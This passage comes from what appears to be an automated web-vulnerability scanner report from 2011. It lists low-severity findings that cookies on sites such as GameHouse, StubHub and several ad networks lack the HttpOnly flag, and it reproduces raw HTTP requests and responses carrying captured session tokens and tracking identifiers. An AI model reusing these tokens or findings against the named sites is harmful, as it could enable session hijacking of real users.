P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9YLAx4ACRSOgR0ARQIbFUSVmxTQFFqUCwLOFd3USsNfwZuUXcGP1dnVC4MKQd0VCRQOFV9CCsBZlcnBGsGCQQgDmcEPgBuVysAP1FnBjFVdlgiDCkAN1I4BG4Bfgg%2FVWNWMFMkUVhQegtxVzZRZg0pBmFRNAZoVzNUIAwxB1pUJFBFVWcIZAFgVyAEYwZiBGsOJQR1ACNXYgB6UXcGKVV2WEkMagBrUmUEcwFgCDlVOFZ3U3VRcFAzCyBXd1FaDXEGLVE0BlpXP1RmDCkHO1QkUDpVMAg4ASdXeAR9BnAEZw50BDwAdFdbACZRJgZgVSdYfQxiAGlSbgQKAX0IRVViVkpTdlFfUBULalcSUV0NCAZBUToGV1c7VDsMPQdgVHFQP1U7CCsBeA%3D%3D; path=/
RNT-Time: D=319510 t=1311107258546611
RNT-Machine: 06
Vary: Accept-Encoding
Content-Length: 67417
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...

14.15. http://support.gamehouse.com/app/contact  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.gamehouse.com
Path:   /app/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/contact HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=AXtXIwN3ACQEbAd3UkcBZQdAAzkGFV1mVysOPVZ2UigCcFY6BiBRaA4tUlhWflMmW2wAIVV1CWFSOQM%2FVVwAewFLAGtQHAQiVlxTGVFsAkYBWldUA0oAaQQEBzhSOAE2B2IDJgZuXTRXcw4r; NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:53 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=BH5TJw15BCAEbAR0AhcJbVcQATsHFFVuA38PPAQkUykMfgRoV3EFPAQnV10CKlYjBjFTcgAgCGAGbVVpVl9SKVEbCWJRHQYgDQcIQldqUhYEX1NQDUQEbQQEBDsCaAk%2BVzIBJAdvVTwDJw8q; path=/
RNT-Time: D=115988 t=1311107153516068
RNT-Machine: 02
Vary: Accept-Encoding
Content-Length: 62277
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...

14.16. http://t.mookie1.com/t/v1/event  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/event?migClientId=3074&migSource=mig&migAction=minor-category&migRemarks=1 HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=2814750682866683; path=/; expires=Sun, 12-Aug-12 18:36:05 GMT; domain=.mookie1.com
Set-Cookie: session=1311100565|1311100565; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

14.17. http://www.gamehouse.com/images/subsidiary.png  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gamehouse.com
Path:   /images/subsidiary.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/subsidiary.png HTTP/1.1
Host: www.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:47 GMT
Set-Cookie: referrer=aHR0cDovL3N1cHBvcnQuZ2FtZWhvdXNlLmNvbS8=
Set-Cookie: JSESSIONID=A68BAE3959CA123F9A7FB421FB8A1170.gh-storefront-app03; Path=/
ETag: W/"2557-1310759798000"
Last-Modified: Fri, 15 Jul 2011 19:56:38 GMT
Content-Type: image/png;charset=UTF-8
Content-Length: 2557
Set-Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Wed, 20-Jul-2011 20:24:53 GMT;path=/;domain=gamehouse.com;httponly

.PNG
.
...IHDR...\...".......N.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE.......=R............LLL.i.... jjj.......]..t.eee...QQQ+Sk+7?")-.8H.V|@T_.a.rrrJJJ...*ET...vvv....|.+Nc^^^
g.lll....a.~~
...[SNIP]...

14.18. http://www.stubhub.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.stubhub.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298 HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1342781785|check#true#1308567445|session#1308567384165-120206#1308569245; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:48 GMT
Server: Apache
Set-Cookie: TLTHID=7AEE7DDAB23610B20167D97254A5AD39; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 4cb3#816c93/
com-stubhub-dye: 4cb3#816c93/
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Set-Cookie: STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; Domain=.stubhub.com; Expires=Thu, 11-Jul-2041 18:39:48 GMT; Path=/
Set-Cookie: STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 37733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

14.19. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest= HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:42:55 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:42:55 GMT
Last-Modified: Sun, 17 Jul 2011 20:42:55 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=6twZuywAYrkZnj3PjCGa8UGSBEUzkooZqU43f%2FGiyI1UXu7W6xg6VD2D0wBlPdOTT5OQE4U8evN3fFU06w2erg%3D%3D; expires=Wed, 18-Jan-2012 20:42:55 GMT; path=/
Set-Cookie: evo5_display=Lb7I6%2B93hnCmP8Ly1Y8aIz6mDQ1J3sznCNFCT7eof5ElbvVxhEDm93raeYwzidf%2FQorvxtKsBHYJrrYeSIbRYA%3D%3D; expires=Thu, 23-Jun-44591 20:42:55 GMT; path=/; domain=.netmng.com
Content-Length: 1472
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=165
...[SNIP]...

14.20. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=bostonglobe&adSpace=728x90&tagKey=987828525&th=20001302335&tKey=undefined&size=728x90&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fboston.com%2F&rurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8117328&a=1&rnd=8110671 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: ANON_ID=aNnUgjyg6ANFA7ubQCktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGEvQjB0C4uEKV7RRQZa3O3qjyKF42ZaMEJ4b32BDDZdVMg6tF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Qm2emyb9ysdZdOpagBZdlUBA6RKMem3yjH2tm2TcZbG4aZbrxc

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aNnWgZbyg6ANFA7ubQBktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGFfQjB0C4uFKV7RRQZa3O3qjygF42ZaMEJ4b32BDDZdVMg6sF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Q62emyb9ysdZdOpagBZdlUBA6RKMgwHPMt1ofr38xf9UMXVrqeZdWOePb28Rqb4pGvWd7; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:42:54 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1146
Expires: 0
Connection: keep-alive

document.write('<script src="http://tag.admeld.com/passback/js/610/bostonglobe/728x90/12/meld.js"><\/script>');
document.write('<script type="text/javascript">\r\nvar TFPix1723665946 = [\r\n
...[SNIP]...

14.21. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=991772&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fsharethis.com%2Fprivacy&jsref=&rnd=1311085721255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; 